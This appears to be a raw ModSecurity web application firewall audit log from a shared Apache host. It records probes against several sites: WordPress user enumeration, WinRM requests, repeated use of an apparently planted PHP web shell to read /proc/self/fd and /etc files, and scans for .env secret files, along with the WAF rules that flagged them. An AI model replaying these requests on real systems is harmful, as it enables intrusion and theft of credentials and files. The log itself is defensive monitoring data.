aFB60k3CmevS3xeTzmox0gAAAAQ 3.144.143.104 41738 127.0.0.1 7081 --e2da8b68-B-- GET /wp-json/wp/v2/users/1 HTTP/1.0 Host: www.rsda.in X-Real-IP: 3.144.143.104 X-Accel-Internal: /internal-nginx-static-location Connection: close Accept-Encoding: gzip, deflate Accept: */* User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0 --e2da8b68-F-- HTTP/1.1 200 OK X-Powered-By: PHP/7.4.33 X-Robots-Tag: noindex Link: <https://www.rsda.in/wp-json/>; rel="https://api.w.org/" X-Content-Type-Options: nosniff Access-Control-Expose-Headers: X-WP-Total, X-WP-TotalPages, Link Access-Control-Allow-Headers: Authorization, X-WP-Nonce, Content-Disposition, Content-MD5, Content-Type Allow: GET Vary: Origin Connection: close Content-Type: application/json; charset=UTF-8 --e2da8b68-H-- Message: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||www.rsda.in|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||www.rsda.in|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] [hostname "www.rsda.in"] [uri "/wp-json/wp/v2/users/1"] [unique_id "aFB60k3CmevS3xeTzmox0gAAAAQ"] Apache-Handler: proxy:unix:/var/www/vhosts/system/rsda.in/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750104786671536 335998 (- - -) Stopwatch2: 1750104786671536 335998; combined=1973, p1=345, p2=1529, p3=0, p4=0, p5=98, sr=96, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --e2da8b68-Z-- --db058d43-A-- [17/Jun/2025:01:45:40.891755 +0530] aFB7bJVkCcfT-Z8NQYyjwgAAAAc 101.251.238.60 45780 127.0.0.1 7080 --db058d43-B-- POST /wsman HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 101.251.238.60 Connection: close Content-Length: 0 Authorization: Negotiate TlRMTVNTUAABAAAAB4IIogAAAAAAAAAAAAAAAAAAAAAGAbEdAAAADw== Content-Type: application/soap+xml;charset=UTF-8 User-Agent: Microsoft WinRM Client --db058d43-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --db058d43-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||198.71.51.75|F|2"] [data "TX:0=application/soap+xml"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Message: Warning. Operator GE matched 5 at TX:incoming_points. [file "/etc/apache2/modsecurity.d/rules/comodo_free/20_Outgoing_FiltersEnd.conf"] [line "35"] [id "214930"] [rev "1"] [msg "COMODO WAF: Inbound Points Exceeded|Total Incoming Points: 5|198.71.51.75|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "FiltersEnd"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||198.71.51.75|F|2"] [data "TX:0=application/soap+xml"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "198.71.51.75"] [uri "/wsman"] [unique_id "aFB7bJVkCcfT-Z8NQYyjwgAAAAc"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator GE matched 5 at TX:incoming_points. [file "/etc/apache2/modsecurity.d/rules/comodo_free/20_Outgoing_FiltersEnd.conf"] [line "35"] [id "214930"] [rev "1"] [msg "COMODO WAF: Inbound Points Exceeded|Total Incoming Points: 5|198.71.51.75|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "FiltersEnd"] [hostname "198.71.51.75"] [uri "/wsman"] [unique_id "aFB7bJVkCcfT-Z8NQYyjwgAAAAc"] Stopwatch: 1750104940888469 3332 (- - -) Stopwatch2: 1750104940888469 3332; combined=2052, p1=444, p2=1428, p3=24, p4=23, p5=133, sr=108, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --db058d43-Z-- --b6612b08-A-- [17/Jun/2025:01:45:44.264669 +0530] aFB7cBwcFb_n1P0IC9x0lAAAAAo 101.251.238.60 45792 127.0.0.1 7080 --b6612b08-B-- POST /wsman HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 101.251.238.60 Connection: close Content-Length: 198 Content-Type: application/soap+xml;charset=UTF-8 User-Agent: Microsoft WinRM Client WSMANIDENTIFY: unauthenticated --b6612b08-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --b6612b08-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||198.71.51.75|F|2"] [data "TX:0=application/soap+xml"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Message: Warning. Operator GE matched 5 at TX:incoming_points. [file "/etc/apache2/modsecurity.d/rules/comodo_free/20_Outgoing_FiltersEnd.conf"] [line "35"] [id "214930"] [rev "1"] [msg "COMODO WAF: Inbound Points Exceeded|Total Incoming Points: 5|198.71.51.75|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "FiltersEnd"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||198.71.51.75|F|2"] [data "TX:0=application/soap+xml"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "198.71.51.75"] [uri "/wsman"] [unique_id "aFB7cBwcFb_n1P0IC9x0lAAAAAo"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator GE matched 5 at TX:incoming_points. [file "/etc/apache2/modsecurity.d/rules/comodo_free/20_Outgoing_FiltersEnd.conf"] [line "35"] [id "214930"] [rev "1"] [msg "COMODO WAF: Inbound Points Exceeded|Total Incoming Points: 5|198.71.51.75|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "FiltersEnd"] [hostname "198.71.51.75"] [uri "/wsman"] [unique_id "aFB7cBwcFb_n1P0IC9x0lAAAAAo"] Stopwatch: 1750104944261404 3315 (- - -) Stopwatch2: 1750104944261404 3315; combined=2054, p1=439, p2=1467, p3=23, p4=25, p5=100, sr=96, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --b6612b08-Z-- --108e0f41-A-- [17/Jun/2025:01:46:44.538825 +0530] aFB7rE3CmevS3xeTzmoyswAAAAQ 34.205.170.13 50080 127.0.0.1 7081 --108e0f41-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=//proc/self/fd&viewfile=//proc/self/fd/84 HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 34.205.170.13 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36 Accept-Encoding: gzip,deflate --108e0f41-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2953 Connection: close Content-Type: text/html; charset=UTF-8 --108e0f41-H-- Message: Warning. Matched phrase "proc/self/fd/8" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/8 found within ARGS:viewfile: /proc/self/fd/84"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "proc/self/fd/8" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/8 found within ARGS:viewfile: /proc/self/fd/84"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFB7rE3CmevS3xeTzmoyswAAAAQ"] Apache-Handler: application/x-httpd-php Stopwatch: 1750105004534156 4722 (- - -) Stopwatch2: 1750105004534156 4722; combined=2609, p1=399, p2=2088, p3=40, p4=29, p5=53, sr=105, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --108e0f41-Z-- --6e406a1b-A-- [17/Jun/2025:01:47:24.714112 +0530] aFB71JVkCcfT-Z8NQYykLgAAAAc 3.216.86.144 35434 127.0.0.1 7081 --6e406a1b-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=//proc/self/fd&viewfile=//proc/self/fd/177 HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 3.216.86.144 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36 Accept-Encoding: gzip,deflate --6e406a1b-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2953 Connection: close Content-Type: text/html; charset=UTF-8 --6e406a1b-H-- Message: Warning. Matched phrase "proc/self/fd/1" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/1 found within ARGS:viewfile: /proc/self/fd/177"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "proc/self/fd/1" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/1 found within ARGS:viewfile: /proc/self/fd/177"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFB71JVkCcfT-Z8NQYykLgAAAAc"] Apache-Handler: application/x-httpd-php Stopwatch: 1750105044709860 4304 (- - -) Stopwatch2: 1750105044709860 4304; combined=2296, p1=351, p2=1824, p3=40, p4=27, p5=54, sr=96, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --6e406a1b-Z-- --05cce162-A-- [17/Jun/2025:01:47:37.062582 +0530] aFB74Y9-jD-p9NsZWnAWEgAAAAE 98.83.177.42 33264 127.0.0.1 7081 --05cce162-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=//proc/self/fd&viewfile=//proc/self/fd/75 HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 98.83.177.42 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36 Accept-Encoding: gzip,deflate --05cce162-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2953 Connection: close Content-Type: text/html; charset=UTF-8 --05cce162-H-- Message: Warning. Matched phrase "proc/self/fd/7" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/7 found within ARGS:viewfile: /proc/self/fd/75"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "proc/self/fd/7" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/7 found within ARGS:viewfile: /proc/self/fd/75"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFB74Y9-jD-p9NsZWnAWEgAAAAE"] Apache-Handler: application/x-httpd-php Stopwatch: 1750105057058021 4614 (- - -) Stopwatch2: 1750105057058021 4614; combined=2533, p1=361, p2=2048, p3=38, p4=27, p5=59, sr=98, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --05cce162-Z-- --32a9037b-A-- [17/Jun/2025:01:48:01.944109 +0530] aFB7-X3hoSwVUy254pEEAgAAACQ 52.70.209.13 47792 127.0.0.1 7081 --32a9037b-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=//proc/self/fd&viewfile=//proc/self/fd/117 HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 52.70.209.13 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36 Accept-Encoding: gzip,deflate --32a9037b-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2953 Connection: close Content-Type: text/html; charset=UTF-8 --32a9037b-H-- Message: Warning. Matched phrase "proc/self/fd/1" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/1 found within ARGS:viewfile: /proc/self/fd/117"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "proc/self/fd/1" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/1 found within ARGS:viewfile: /proc/self/fd/117"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFB7-X3hoSwVUy254pEEAgAAACQ"] Apache-Handler: application/x-httpd-php Stopwatch: 1750105081939334 4832 (- - -) Stopwatch2: 1750105081939334 4832; combined=2566, p1=495, p2=1941, p3=39, p4=30, p5=61, sr=122, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --32a9037b-Z-- --38155519-A-- [17/Jun/2025:01:48:32.711100 +0530] aFB8GMl682-knofG8qdghAAAAAM 52.3.155.146 60416 127.0.0.1 7081 --38155519-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=//proc/self/fd&viewfile=//proc/self/fd/63 HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 52.3.155.146 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36 Accept-Encoding: gzip,deflate --38155519-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2952 Connection: close Content-Type: text/html; charset=UTF-8 --38155519-H-- Message: Warning. Matched phrase "proc/self/fd/6" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/6 found within ARGS:viewfile: /proc/self/fd/63"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "proc/self/fd/6" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/6 found within ARGS:viewfile: /proc/self/fd/63"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFB8GMl682-knofG8qdghAAAAAM"] Apache-Handler: application/x-httpd-php Stopwatch: 1750105112706555 4598 (- - -) Stopwatch2: 1750105112706555 4598; combined=2440, p1=382, p2=1930, p3=40, p4=29, p5=59, sr=105, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --38155519-Z-- --05b1305e-A-- [17/Jun/2025:01:54:12.600506 +0530] aFB9bBwcFb_n1P0IC9x2LAAAAAo 3.232.82.72 50718 127.0.0.1 7081 --05b1305e-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=//etc/apt/apt.conf.d&viewfile=//etc/apt/apt.conf.d/01autoremove HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 3.232.82.72 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36 Accept-Encoding: gzip,deflate --05b1305e-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3224 Connection: close Content-Type: text/html; charset=UTF-8 --05b1305e-E-- --05b1305e-H-- Message: Warning. Matched phrase "etc/apt/apt.conf" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/apt/apt.conf found within ARGS:path: /etc/apt/apt.conf.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Message: Warning. Matched phrase "etc/apt/apt.conf" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/apt/apt.conf found within ARGS:viewfile: /etc/apt/apt.conf.d/01autoremove"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/apt/apt.conf" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/apt/apt.conf found within ARGS:path: /etc/apt/apt.conf.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFB9bBwcFb_n1P0IC9x2LAAAAAo"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/apt/apt.conf" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/apt/apt.conf found within ARGS:viewfile: /etc/apt/apt.conf.d/01autoremove"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFB9bBwcFb_n1P0IC9x2LAAAAAo"] Apache-Handler: application/x-httpd-php Stopwatch: 1750105452596388 4175 (- - -) Stopwatch2: 1750105452596388 4175; combined=2254, p1=346, p2=1733, p3=37, p4=35, p5=102, sr=93, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --05b1305e-Z-- --79a04a6b-A-- [17/Jun/2025:01:58:28.663567 +0530] aFB-bEcTB7P_sALtclD6wAAAAAI 18.206.47.187 56424 127.0.0.1 7081 --79a04a6b-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=//etc/lvm/profile&viewfile=//etc/lvm/profile/vdo-small.profile HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 18.206.47.187 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36 Accept-Encoding: gzip,deflate --79a04a6b-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3253 Connection: close Content-Type: text/html; charset=UTF-8 --79a04a6b-H-- Message: Warning. Matched phrase ".profile" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: .profile found within ARGS:viewfile: /etc/lvm/profile/vdo-small.profile"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase ".profile" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: .profile found within ARGS:viewfile: /etc/lvm/profile/vdo-small.profile"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFB-bEcTB7P_sALtclD6wAAAAAI"] Apache-Handler: application/x-httpd-php Stopwatch: 1750105708659458 4161 (- - -) Stopwatch2: 1750105708659458 4161; combined=2092, p1=391, p2=1567, p3=35, p4=44, p5=55, sr=107, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --79a04a6b-Z-- --adee093e-A-- [17/Jun/2025:02:00:46.251183 +0530] aFB-9X3hoSwVUy254pEGQAAAACQ 93.123.109.81 49940 127.0.0.1 7081 --adee093e-B-- GET /.env HTTP/1.0 Host: www.bspsons.com X-Real-IP: 93.123.109.81 X-Accel-Internal: /internal-nginx-static-location Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept-Encoding: gzip, deflate Accept: */* --adee093e-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://www.bspsons.com/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 --adee093e-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.bspsons.com"] [uri "/.env"] [unique_id "aFB-9X3hoSwVUy254pEGQAAAACQ"] Apache-Handler: proxy:unix:/var/www/vhosts/system/bspsons.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750105845690302 560944 (- - -) Stopwatch2: 1750105845690302 560944; combined=2000, p1=661, p2=1247, p3=0, p4=0, p5=91, sr=93, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --adee093e-Z-- --1ceaa40d-A-- [17/Jun/2025:02:00:47.211486 +0530] aFB-9pVkCcfT-Z8NQYymeQAAAAc 93.123.109.81 49988 127.0.0.1 7081 --1ceaa40d-B-- GET /api/.env HTTP/1.0 Host: www.bspsons.com X-Real-IP: 93.123.109.81 X-Accel-Internal: /internal-nginx-static-location Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept-Encoding: gzip, deflate Accept: */* --1ceaa40d-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://www.bspsons.com/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 --1ceaa40d-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.bspsons.com"] [uri "/api/.env"] [unique_id "aFB-9pVkCcfT-Z8NQYymeQAAAAc"] Apache-Handler: proxy:unix:/var/www/vhosts/system/bspsons.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750105846692085 519471 (- - -) Stopwatch2: 1750105846692085 519471; combined=2047, p1=503, p2=1451, p3=0, p4=0, p5=93, sr=170, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --1ceaa40d-Z-- --ce72cc17-A-- [17/Jun/2025:02:00:48.154020 +0530] aFB-90cTB7P_sALtclD7NwAAAAI 93.123.109.81 50018 127.0.0.1 7081 --ce72cc17-B-- GET /.env.save HTTP/1.0 Host: www.bspsons.com X-Real-IP: 93.123.109.81 X-Accel-Internal: /internal-nginx-static-location Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept-Encoding: gzip, deflate Accept: */* --ce72cc17-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://www.bspsons.com/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 --ce72cc17-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file 